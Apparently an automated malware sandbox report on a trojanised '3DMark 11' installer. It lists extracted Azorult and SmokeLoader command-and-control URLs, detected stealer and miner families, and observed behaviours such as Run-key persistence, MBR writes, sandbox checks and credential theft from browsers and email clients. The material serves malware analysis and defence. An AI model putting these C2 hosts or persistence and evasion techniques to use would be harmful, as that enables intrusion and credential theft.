Overview
overview
10Static
static
10ฺฺฺK...ฺฺ
windows10_x64
10ฺฺฺK...ฺฺ
windows10_x64
10ฺฺฺK...ฺฺ
windows10_x64
10ฺฺฺK...ฺฺ
windows10_x64
10ฺฺฺK...ฺฺ
windows10_x64
10ฺฺฺK...ฺฺ
windows10_x64
10ฺฺฺK...ฺฺ
windows10_x64
ฺฺฺK...ฺฺ
windows10_x64
10ฺฺฺK...ฺฺ
windows10_x64
ฺฺฺK...ฺฺ
windows10_x64
10ฺฺฺK...ฺฺ
windows10_x64
10ฺฺฺK...ฺฺ
windows10_x64
10ฺฺฺK...ฺฺ
windows10_x64
1ฺฺฺK...ฺฺ
windows10_x64
8ฺฺฺK...ฺฺ
windows10_x64
3ฺฺฺK...ฺฺ
windows10_x64
10ฺฺฺK...ฺฺ
windows10_x64
10ฺฺฺK...ฺฺ
windows10_x64
10ฺฺฺK...ฺฺ
windows10_x64
1ฺฺฺK...ฺฺ
windows10_x64
10ฺฺฺK...ฺฺ
windows10_x64
10ฺฺฺK...ฺฺ
windows10_x64
10ฺฺฺK...ฺฺ
windows10_x64
9ฺฺฺK...ฺฺ
windows10_x64
8ฺฺฺK...ฺฺ
windows10_x64
1ฺฺฺK...ฺฺ
windows10_x64
10ฺฺฺK...ฺฺ
windows10_x64
1ฺฺฺK...ฺฺ
windows10_x64
8ฺฺฺK...ฺฺ
windows10_x64
ฺฺฺK...ฺฺ
windows10_x64
10ฺฺฺK...ฺฺ
windows10_x64
ฺฺฺK...ฺฺ
windows10_x64
Analysis
-
max time kernel
936s -
max time network
998s -
platform
windows10_x64 -
resource
win10v20201028 -
submitted
20-11-2020 14:34
Static task
static1
Behavioral task
behavioral1
Sample
08751be484e1572995ebb085df1c2c6372084d63a64dce7fab28130d79a6ea2d.exe.dll
Resource
win10v20201028
windows10_x64
0 signatures
0 seconds
Behavioral task
behavioral2
Sample
0a9f79abd48b95544d7e2b6658637d1eb23067a94e10bf06d05c9ecc73cf4b51.exe
Resource
win10v20201028
windows10_x64
0 signatures
0 seconds
Behavioral task
behavioral3
Sample
0di3x.exe
Resource
win10v20201028
windows10_x64
0 signatures
0 seconds
Behavioral task
behavioral4
Sample
2019-09-02_22-41-10.exe
Resource
win10v20201028
windows10_x64
0 signatures
0 seconds
Behavioral task
behavioral5
Sample
2c01b007729230c415420ad641ad92eb.exe
Resource
win10v20201028
windows10_x64
0 signatures
0 seconds
Behavioral task
behavioral6
Sample
31.exe
Resource
win10v20201028
agenttesladanabotdharmaformbookgozi_rm3qakbot86920224spx1291590734339appi0qiw9zagilenetbankerbotnetcoreentitycryptoneevasionkeyloggerpackerpersistenceransomwareratrezer0spywarestealertrojan
windows10_x64
0 signatures
0 seconds
Behavioral task
behavioral7
Sample
3DMark 11 Advanced Edition.exe
Resource
win10v20201028
agentteslaazorultplugxredlinesmokeloadertofseexmrigbackdoorbootkitdiscoveryevasioninfostealerkeyloggermacrominerpersistencespywarestealertrojanupxvmprotect
windows10_x64
0 signatures
0 seconds
Behavioral task
behavioral8
Sample
42f972925508a82236e8533567487761.exe
Resource
win10v20201028
windows10_x64
0 signatures
0 seconds
Behavioral task
behavioral9
Sample
5da0116af495e6d8af7241da9b8281d918b9ff9a98a3deab4cca1aec1e456c18.exe
Resource
win10v20201028
windows10_x64
0 signatures
0 seconds
Behavioral task
behavioral10
Sample
69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe
Resource
win10v20201028
windows10_x64
0 signatures
0 seconds
Behavioral task
behavioral11
Sample
905d572f23883f5f161f920e53473989cf7dffc16643aa759f77842e54add550.exe
Resource
win10v20201028
windows10_x64
0 signatures
0 seconds
Behavioral task
behavioral12
Sample
948340be97cc69c2cf8e5c8327ee52a89eeb50095f978696c710ad773a46b654.exe
Resource
win10v20201028
windows10_x64
0 signatures
0 seconds
Behavioral task
behavioral13
Sample
95560f1a465e8ba87a73f8e60a6657545073d55c3b5cfc2ffdaf3d69d46afcf9.exe.dll
Resource
win10v20201028
windows10_x64
0 signatures
0 seconds
Behavioral task
behavioral14
Sample
Archive.zip__ccacaxs2tbz2t6ob3e.exe
Resource
win10v20201028
windows10_x64
0 signatures
0 seconds
Behavioral task
behavioral15
Sample
CVE-2018-15982_PoC.swf
Resource
win10v20201028
windows10_x64
0 signatures
0 seconds
Behavioral task
behavioral16
Sample
DiskInternals_Uneraser_v5_keygen.exe
Resource
win10v20201028
windows10_x64
0 signatures
0 seconds
Behavioral task
behavioral17
Sample
ForceOp 2.8.7 - By RaiSence.exe
Resource
win10v20201028
windows10_x64
0 signatures
0 seconds
Behavioral task
behavioral18
Sample
HYDRA.exe
Resource
win10v20201028
windows10_x64
0 signatures
0 seconds
Behavioral task
behavioral19
Sample
KLwC6vii.exe
Resource
win10v20201028
windows10_x64
0 signatures
0 seconds
Behavioral task
behavioral20
Sample
Keygen.exe
Resource
win10v20201028
asyncratazorultmodiloaderoskiraccoonremcos5e4db353b88c002ba6466c06437973619aad03b3xxxxxxxxxxxdiscoveryevasioninfostealerpersistenceratspywarestealertrojan
windows10_x64
0 signatures
0 seconds
Behavioral task
behavioral21
Sample
Lonelyscreen.1.2.9.keygen.by.Paradox.exe
Resource
win10v20201028
windows10_x64
0 signatures
0 seconds
Behavioral task
behavioral22
Sample
LtHv0O2KZDK4M637.exe
Resource
win10v20201028
windows10_x64
0 signatures
0 seconds
Behavioral task
behavioral23
Sample
Magic_File_v3_keygen_by_KeygenNinja.exe
Resource
win10v20201028
windows10_x64
0 signatures
0 seconds
Behavioral task
behavioral24
Sample
OnlineInstaller.exe
Resource
win10v20201028
windows10_x64
0 signatures
0 seconds
Behavioral task
behavioral25
Sample
Remouse.Micro.Micro.v3.5.3.serial.maker.by.aaocg.exe
Resource
win10v20201028
windows10_x64
0 signatures
0 seconds
windows10_x64
0 signatures
0 seconds
Behavioral task
behavioral27
Sample
SecuriteInfo.com.Generic.mg.cde56cf0169830ee.29869.dll
Resource
win10v20201028
windows10_x64
0 signatures
0 seconds
Behavioral task
behavioral28
Sample
SecurityTaskManager_Setup.exe
Resource
win10v20201028
windows10_x64
0 signatures
0 seconds
Behavioral task
behavioral29
Sample
Treasure.Vault.3D.Screensaver.keygen.by.Paradox.exe
Resource
win10v20201028
agentteslaazorultplugxponyredlinesmokeloadertofseexmrigbackdoorbootkitdiscoveryevasioninfostealerkeyloggermacrominerpersistenceratspywarestealertrojanupxvmprotect
windows10_x64
0 signatures
0 seconds
Behavioral task
behavioral30
Sample
VyprVPN.exe
Resource
win10v20201028
windows10_x64
0 signatures
0 seconds
Behavioral task
behavioral31
Sample
WSHSetup[1].exe
Resource
win10v20201028
windows10_x64
0 signatures
0 seconds
Behavioral task
behavioral32
Sample
Yard.dll
Resource
win10v20201028
windows10_x64
0 signatures
0 seconds
Errors
Reason
Machine shutdown
General
-
Target
3DMark 11 Advanced Edition.exe
-
Size
11.6MB
-
MD5
236d7524027dbce337c671906c9fe10b
-
SHA1
7d345aa201b50273176ae0ec7324739d882da32e
-
SHA256
400b64f8c61623ead9f579b99735b1b0d9febe7c829e8bdafc9b3a3269bbe21c
-
SHA512
e5c2f87923b3331719261101b2f606298fb66442e56a49708199d8472c1ac4a72130612d3a9c344310f36fcb3cf39e4637f7dd8fb3841c61b01b95bb3794610a
Malware Config
Extracted
Family
azorult
C2
http://kvaka.li/1210776429.php
Extracted
Family
smokeloader
Version
2020
C2
http://naritouzina.net/
http://nukaraguasleep.net/
http://notfortuaj.net/
http://natuturalistic.net/
http://zaniolofusa.net/
http://vintrsi.com/upload/
http://woatdert.com/upload/
http://waruse.com/upload/
rc4.i32
rc4.i32
Extracted
Family
smokeloader
Version
2019
C2
http://10022020newfolder1002002131-service1002.space/
http://10022020newfolder1002002231-service1002.space/
http://10022020newfolder3100231-service1002.space/
http://10022020newfolder1002002431-service1002.space/
http://10022020newfolder1002002531-service1002.space/
http://10022020newfolder33417-01242510022020.space/
http://10022020test125831-service1002012510022020.space/
http://10022020test136831-service1002012510022020.space/
http://10022020test147831-service1002012510022020.space/
http://10022020test146831-service1002012510022020.space/
http://10022020test134831-service1002012510022020.space/
http://10022020est213531-service100201242510022020.ru/
http://10022020yes1t3481-service1002012510022020.ru/
http://10022020test13561-service1002012510022020.su/
http://10022020test14781-service1002012510022020.info/
http://10022020test13461-service1002012510022020.net/
http://10022020test15671-service1002012510022020.tech/
http://10022020test12671-service1002012510022020.online/
http://10022020utest1341-service1002012510022020.ru/
http://10022020uest71-service100201dom2510022020.ru/
http://10022020test61-service1002012510022020.website/
http://10022020test51-service1002012510022020.xyz/
http://10022020test41-service100201pro2510022020.ru/
http://10022020yest31-service100201rus2510022020.ru/
http://10022020rest21-service1002012510022020.eu/
http://10022020test11-service1002012510022020.press/
http://10022020newfolder4561-service1002012510022020.ru/
http://10022020rustest213-service1002012510022020.ru/
http://10022020test281-service1002012510022020.ru/
http://10022020test261-service1002012510022020.space/
http://10022020yomtest251-service1002012510022020.ru/
http://10022020yirtest231-service1002012510022020.ru/
rc4.i32
rc4.i32
Signatures
-
AgentTesla
Agent Tesla is a remote access tool (RAT) written in visual basic.
-
Azorult
An information stealer that was first discovered in 2016, targeting browsing history and passwords.
-
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
SmokeLoader
Modular backdoor trojan in use since 2014.
-
resource yara_rule behavioral7/memory/1060-348-0x0000000004E00000-0x0000000004E23000-memory.dmp agent_tesla behavioral7/memory/1060-355-0x0000000004FB0000-0x0000000004FD2000-memory.dmp agent_tesla -
XMRig Miner Payload 2 IoCs
resource yara_rule behavioral7/memory/3720-639-0x0000000002880000-0x0000000002971000-memory.dmp xmrig behavioral7/memory/3720-641-0x000000000291259C-mapping.dmp xmrig -
Creates new service(s) 1 TTPs
-
Executes dropped EXE 47 IoCs
pid Process 3128 intro.exe 3800 keygen-pr.exe 2436 keygen-step-1.exe 4028 keygen-step-2.exe 3012 keygen-step-3.exe 2856 keygen-step-4.exe 408 key.exe 208 002.exe 1492 Setup.exe 3656 setup.exe 748 aliens.exe 3740 jg2_2qua.exe 424 1A27AE19C9E414DC.exe 1108 1A27AE19C9E414DC.exe 3532 1605887554245.exe 2212 askinstall21.exe 3808 1605887560120.exe 3728 hjjgaa.exe 248 1605887565839.exe 1200 jfiag3g_gg.exe 1356 1605887569464.exe 812 jfiag3g_gg.exe 3744 ThunderFW.exe 1928 MiniThunderPlatform.exe 3152 1021C014A4C9A552.exe 1116 1021C014A4C9A552.tmp 2620 seed.sfx.exe 184 seed.exe 4664 571A.exe 4692 5806.exe 4720 5CF8.exe 4748 615E.exe 4876 6D17.exe 5052 571A.exe 1060 76AD.exe 4348 pueztfce.exe 4808 8072.exe 5104 8B60.exe 720 94D7.exe 4896 updatewin1.exe 4700 updatewin2.exe 4124 94D7.exe 1456 A64D.exe 4940 jfiag3g_gg.exe 1380 5.exe 3200 AD53.exe 4756 jfiag3g_gg.exe -
Modifies Windows Firewall 1 TTPs
-
Sets service image path in registry 2 TTPs
-
resource yara_rule behavioral7/files/0x000100000001ac18-79.dat office_xlm_macros -
resource yara_rule behavioral7/files/0x000100000001ac3a-145.dat upx behavioral7/files/0x000100000001ac3a-147.dat upx behavioral7/files/0x000100000001ac3a-158.dat upx behavioral7/files/0x000100000001ac3a-159.dat upx behavioral7/files/0x000100000001ac3a-508.dat upx behavioral7/files/0x000100000001ac3a-620.dat upx behavioral7/files/0x000100000001ac3a-621.dat upx -
resource yara_rule behavioral7/files/0x000700000001a9b3-485.dat vmprotect behavioral7/files/0x000700000001a9b3-483.dat vmprotect -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\Control Panel\International\Geo\Nation cmd.exe -
Loads dropped DLL 20 IoCs
pid Process 1492 Setup.exe 1492 Setup.exe 1492 Setup.exe 1976 MsiExec.exe 424 1A27AE19C9E414DC.exe 424 1A27AE19C9E414DC.exe 1928 MiniThunderPlatform.exe 1928 MiniThunderPlatform.exe 1928 MiniThunderPlatform.exe 1928 MiniThunderPlatform.exe 1928 MiniThunderPlatform.exe 1928 MiniThunderPlatform.exe 1928 MiniThunderPlatform.exe 184 seed.exe 4808 8072.exe 4124 94D7.exe 4692 5806.exe 4692 5806.exe 1380 5.exe 1380 5.exe -
Modifies file permissions 1 TTPs 1 IoCs
pid Process 4864 icacls.exe -
Reads user/profile data of local email clients 2 TTPs
Email clients store some user data on disk where infostealers will often target it.
-
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Adds Run key to start application 2 TTPs 2 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\haleng = "C:\\Users\\Admin\\AppData\\Local\\Temp\\haleng.exe" hjjgaa.exe Set value (str) \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\Software\Microsoft\Windows\CurrentVersion\Run\SysHelper = "\"C:\\Users\\Admin\\AppData\\Local\\2a64b66f-6d0b-4709-b3fc-98e65bf4c601\\571A.exe\" --AutoStart" 571A.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
description ioc Process Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA aliens.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA jg2_2qua.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA 1A27AE19C9E414DC.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA 1A27AE19C9E414DC.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA 8B60.exe -
Enumerates connected drives 3 TTPs 48 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
description ioc Process File opened (read-only) \??\U: msiexec.exe File opened (read-only) \??\O: msiexec.exe File opened (read-only) \??\S: msiexec.exe File opened (read-only) \??\B: msiexec.exe File opened (read-only) \??\L: msiexec.exe File opened (read-only) \??\T: msiexec.exe File opened (read-only) \??\P: msiexec.exe File opened (read-only) \??\W: msiexec.exe File opened (read-only) \??\W: msiexec.exe File opened (read-only) \??\F: msiexec.exe File opened (read-only) \??\N: msiexec.exe File opened (read-only) \??\U: msiexec.exe File opened (read-only) \??\Q: msiexec.exe File opened (read-only) \??\I: msiexec.exe File opened (read-only) \??\K: msiexec.exe File opened (read-only) \??\H: msiexec.exe File opened (read-only) \??\L: msiexec.exe File opened (read-only) \??\M: msiexec.exe File opened (read-only) \??\X: msiexec.exe File opened (read-only) \??\I: msiexec.exe File opened (read-only) \??\J: msiexec.exe File opened (read-only) \??\S: msiexec.exe File opened (read-only) \??\P: msiexec.exe File opened (read-only) \??\V: msiexec.exe File opened (read-only) \??\T: msiexec.exe File opened (read-only) \??\F: msiexec.exe File opened (read-only) \??\K: msiexec.exe File opened (read-only) \??\O: msiexec.exe File opened (read-only) \??\X: msiexec.exe File opened (read-only) \??\J: msiexec.exe File opened (read-only) \??\V: msiexec.exe File opened (read-only) \??\Z: msiexec.exe File opened (read-only) \??\G: msiexec.exe File opened (read-only) \??\H: msiexec.exe File opened (read-only) \??\R: msiexec.exe File opened (read-only) \??\A: msiexec.exe File opened (read-only) \??\E: msiexec.exe File opened (read-only) \??\G: msiexec.exe File opened (read-only) \??\R: msiexec.exe File opened (read-only) \??\Y: msiexec.exe File opened (read-only) \??\A: msiexec.exe File opened (read-only) \??\E: msiexec.exe File opened (read-only) \??\N: msiexec.exe File opened (read-only) \??\B: msiexec.exe File opened (read-only) \??\Q: msiexec.exe File opened (read-only) \??\M: msiexec.exe File opened (read-only) \??\Y: msiexec.exe File opened (read-only) \??\Z: msiexec.exe -
JavaScript code in executable 6 IoCs
resource yara_rule behavioral7/files/0x000100000001ac18-79.dat js behavioral7/files/0x000100000001ac41-181.dat js behavioral7/files/0x000100000001ac41-182.dat js behavioral7/files/0x000100000001ad73-597.dat js behavioral7/files/0x000100000001ad73-616.dat js behavioral7/files/0x000100000001ad73-615.dat js -
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Looks up external IP address via web service 5 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 263 checkip.amazonaws.com 75 ip-api.com 210 api.2ip.ua 211 api.2ip.ua 229 api.2ip.ua -
Writes to the Master Boot Record (MBR) 1 TTPs 4 IoCs
Bootkits write to the MBR to gain persistence at a level below the operating system.
description ioc Process File opened for modification \??\PhysicalDrive0 1A27AE19C9E414DC.exe File opened for modification \??\PhysicalDrive0 1A27AE19C9E414DC.exe File opened for modification \??\PhysicalDrive0 MiniThunderPlatform.exe File opened for modification \??\PhysicalDrive0 aliens.exe -
Drops file in System32 directory 1 IoCs
description ioc Process File created C:\Windows\SysWOW64\config\systemprofile:.repos svchost.exe -
Modifies service 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\bmvfvvhv\ImagePath = "C:\\Windows\\SysWOW64\\bmvfvvhv\\pueztfce.exe" svchost.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 1 IoCs
pid Process 748 aliens.exe -
Suspicious use of SetThreadContext 6 IoCs
description pid Process procid_target PID 424 set thread context of 1712 424 1A27AE19C9E414DC.exe 108 PID 424 set thread context of 808 424 1A27AE19C9E414DC.exe 118 PID 424 set thread context of 3768 424 1A27AE19C9E414DC.exe 124 PID 424 set thread context of 3020 424 1A27AE19C9E414DC.exe 127 PID 4348 set thread context of 3900 4348 pueztfce.exe 178 PID 720 set thread context of 4124 720 94D7.exe 182 -
Drops file in Program Files directory 38 IoCs
description ioc Process File created C:\Program Files (x86)\RearRips\images\is-PA05R.tmp 1021C014A4C9A552.tmp File created C:\Program Files (x86)\RearRips\images\is-RL9JK.tmp 1021C014A4C9A552.tmp File created C:\Program Files (x86)\RearRips\images\is-2FVCB.tmp 1021C014A4C9A552.tmp File created C:\Program Files (x86)\RearRips\images\is-OHHJ7.tmp 1021C014A4C9A552.tmp File opened for modification C:\Program Files (x86)\Seed Trade seed.sfx.exe File created C:\Program Files (x86)\RearRips\images\is-FELVB.tmp 1021C014A4C9A552.tmp File created C:\Program Files (x86)\RearRips\is-EUTGF.tmp 1021C014A4C9A552.tmp File created C:\Program Files (x86)\9ku5npt6tedk\__tmp_rar_sfx_access_check_260048593 setup.exe File created C:\Program Files (x86)\RearRips\is-6B1BB.tmp 1021C014A4C9A552.tmp File created C:\Program Files (x86)\RearRips\is-B7953.tmp 1021C014A4C9A552.tmp File created C:\Program Files (x86)\RearRips\images\is-H2R2V.tmp 1021C014A4C9A552.tmp File created C:\Program Files (x86)\RearRips\images\is-QBA9K.tmp 1021C014A4C9A552.tmp File created C:\Program Files (x86)\RearRips\images\is-J94J3.tmp 1021C014A4C9A552.tmp File created C:\Program Files (x86)\Seed Trade\Seed\__tmp_rar_sfx_access_check_260135468 seed.sfx.exe File created C:\Program Files (x86)\RearRips\unins000.dat 1021C014A4C9A552.tmp File created C:\Program Files (x86)\RearRips\images\is-41FQO.tmp 1021C014A4C9A552.tmp File created C:\Program Files (x86)\RearRips\images\is-0RLMA.tmp 1021C014A4C9A552.tmp File created C:\Program Files (x86)\RearRips\images\is-B0JJI.tmp 1021C014A4C9A552.tmp File opened for modification C:\Program Files (x86)\Seed Trade\Seed seed.sfx.exe File opened for modification C:\Program Files (x86)\9ku5npt6tedk setup.exe File opened for modification C:\Program Files (x86)\RearRips\DreamTrip.exe 1021C014A4C9A552.tmp File opened for modification C:\Program Files (x86)\RearRips\seed.sfx.exe 1021C014A4C9A552.tmp File created C:\Program Files (x86)\RearRips\is-0KT0D.tmp 1021C014A4C9A552.tmp File created C:\Program Files (x86)\RearRips\is-2SSGV.tmp 1021C014A4C9A552.tmp File created C:\Program Files (x86)\RearRips\is-O5C80.tmp 1021C014A4C9A552.tmp File created C:\Program Files (x86)\RearRips\lang\is-84R78.tmp 1021C014A4C9A552.tmp File created C:\Program Files (x86)\Seed Trade\Seed\seed.exe seed.sfx.exe File opened for modification C:\Program Files (x86)\9ku5npt6tedk\aliens.exe setup.exe File created C:\Program Files (x86)\RearRips\images\is-C57T9.tmp 1021C014A4C9A552.tmp File created C:\Program Files (x86)\RearRips\images\is-AO9M7.tmp 1021C014A4C9A552.tmp File created C:\Program Files (x86)\RearRips\lang\is-ENE47.tmp 1021C014A4C9A552.tmp File created C:\Program Files (x86)\RearRips\is-D0R7N.tmp 1021C014A4C9A552.tmp File opened for modification C:\Program Files (x86)\Seed Trade\Seed\seed.exe seed.sfx.exe File created C:\Program Files (x86)\9ku5npt6tedk\aliens.exe setup.exe File created C:\Program Files (x86)\RearRips\images\is-UMPB0.tmp 1021C014A4C9A552.tmp File created C:\Program Files (x86)\RearRips\images\is-HR60F.tmp 1021C014A4C9A552.tmp File opened for modification C:\Program Files (x86)\RearRips\unins000.dat 1021C014A4C9A552.tmp File created C:\Program Files (x86)\RearRips\images\is-A6CVB.tmp 1021C014A4C9A552.tmp -
Drops file in Windows directory 1 IoCs
description ioc Process File opened for modification C:\Windows\Debug\ESE.TXT MicrosoftEdge.exe -
Launches sc.exe
Sc.exe is a Windows utlilty to control services on the system.
-
Checks SCSI registry key(s) 3 TTPs 21 IoCs
SCSI information is often read in order to detect sandboxing environments.
description ioc Process Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI 94D7.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_SANU&PROD_SANU_DVD-ROM\4&37CE57BA&0&010000 1A27AE19C9E414DC.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\FriendlyName 1A27AE19C9E414DC.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI seed.exe Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI 94D7.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_&PROD_HEARTDISK\4&37CE57BA&0&000000 1A27AE19C9E414DC.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\FriendlyName 1A27AE19C9E414DC.exe Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI seed.exe Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI seed.exe Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI 8072.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\FriendlyName 1A27AE19C9E414DC.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_SANU&PROD_SANU_DVD-ROM\4&37CE57BA&0&010000 1A27AE19C9E414DC.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\DeviceDesc 1A27AE19C9E414DC.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\DeviceDesc 1A27AE19C9E414DC.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\FriendlyName 1A27AE19C9E414DC.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\DeviceDesc 1A27AE19C9E414DC.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_&PROD_HEARTDISK\4&37CE57BA&0&000000 1A27AE19C9E414DC.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\DeviceDesc 1A27AE19C9E414DC.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI 8072.exe Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI 8072.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI 94D7.exe -
Checks processor information in registry 2 TTPs 4 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 5806.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString 5806.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 5.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString 5.exe -
Delays execution with timeout.exe 1 IoCs
pid Process 4368 timeout.exe -
Kills process with taskkill 5 IoCs
pid Process 3164 taskkill.exe 2444 taskkill.exe 4884 taskkill.exe 4220 taskkill.exe 2008 taskkill.exe -
Modifies Control Panel 1 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\Control Panel\Colors MicrosoftEdge.exe -
description ioc Process Key created \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\Software\Microsoft\Internet Explorer\Main MicrosoftEdgeCP.exe Key created \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\Software\Microsoft\Internet Explorer\Main MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\Software\Microsoft\Internet Explorer\Main browser_broker.exe -
Modifies data under HKEY_USERS 2 IoCs
description ioc Process Set value (data) \REGISTRY\USER\.DEFAULT\Control Panel\Buses\Config0 = 9cde173e5d0aa50524edb47d450dd49d084297dce82e72baa46d34fdc48d541da760aaa285cd945d24edb47d470dd49d024195daf71261adc06d04fda6e22673bbc9154961cda56913d48248733ee4ad644490bdb67b26ec96550dcdf68d3c74bbc4103d29fcac6911d9804b743bd4f10b4c90d8f6127db9a45e3494b48d662fd69a430f32fea05d579fc2223064b9f8641fc489b47c23ef90583491abee3571bbd91d5061cda56913d48248733ee4a864c9d49e8717d3ecfc6d34fdc48c541de4da1b4f6f92e72f52edb47d440dd49d644024b7530814dda46d3731d68e541de4ac4c082afca5690adc87496a35ec9d642df4bd844d14dda46d34fdc48d541de4ad743d04cd945d24edb47d440dd49d642df4bd844d14dda46d34fdc48d541de4ad923c04cd svchost.exe Key created \REGISTRY\USER\.DEFAULT\Control Panel\Buses svchost.exe -
Modifies registry class 325 IoCs
description ioc Process Set value (int) \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Internet Settings\PrivacyAdvanced = "0" MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Software\Microsoft\SystemCertificates\Disallowed\CTLs MicrosoftEdgeCP.exe Key created \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates MicrosoftEdge.exe Set value (data) \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\CIStatus\SignaturePolicy = 06000000 MicrosoftEdgeCP.exe Key created \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings MicrosoftEdge.exe Set value (str) \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\TypedURLs\url2 = "https://login.aliexpress.com/" MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\DOMStorage\Total\ = "651" MicrosoftEdgeCP.exe Set value (int) \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Recovery\PendingRecovery\ReadingStorePending = "0" MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local 